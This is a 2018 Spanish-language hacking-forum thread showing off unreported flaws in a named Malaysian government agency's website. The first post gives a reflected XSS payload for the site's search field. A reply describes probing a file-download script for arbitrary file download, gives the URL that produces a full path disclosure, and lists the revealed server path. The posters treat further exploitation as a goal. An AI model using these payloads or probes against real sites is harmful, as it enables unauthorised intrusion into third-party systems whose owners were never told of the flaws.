Imprimir Página - [XSS] Official Website of Malaysian Institute of Road Safety Research (MIROS)

Título: [XSS] Official Website of Malaysian Institute of Road Safety Research (MIROS)
Publicado por: Drok3r en Julio 26, 2018, 10:52:33 PM

(https://i.imgur.com/dgrjkcQ.png)

URL: https://www.miros.gov.my
Vector: search
Payload: x'"><script>alert(/Drok3r/)</script>
Autor: Drok3r (redbirdTEAM, CiberSecurityRECON)
Reportado: NO

Título: Re:[XSS] Official Website of Malaysian Institute of Road Safety Research (MIROS)
Publicado por: Nobody en Agosto 09, 2018, 03:50:39 AM

¡Hola!

No indagué mucho, pero al principio parecía vulnerable a Arbitrary File Download, aunque no logro bypassear el filtro.
De todas formas, conseguí un FPD generando un error a la hora de utilizar el archivo "dl.php" provisto por ellos.
https://www.miros.gov.my/1/dl.php?filename=.
FPD: C:\xampp\htdocs\miros\1\dl.php

Saludos.

Título: Re:[XSS] Official Website of Malaysian Institute of Road Safety Research (MIROS)
Publicado por: Drok3r en Agosto 11, 2018, 08:46:56 PM

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
¡Hola!

No indagué mucho, pero al principio parecía vulnerable a Arbitrary File Download, aunque no logro bypassear el filtro.
De todas formas, conseguí un FPD generando un error a la hora de utilizar el archivo "dl.php" provisto por ellos.
https://www.miros.gov.my/1/dl.php?filename=.
FPD: C:\xampp\htdocs\miros\1\dl.php

Saludos.

Hola...

Muy interesante... igual con un poco de tiempo de logra sacar algo

Underc0de - La Casa de los Informáticos

[In]Seguridad Informática => Bugs y Exploits => Hacking ShowOff => Mensaje iniciado por: Drok3r en Julio 26, 2018, 10:52:33 PM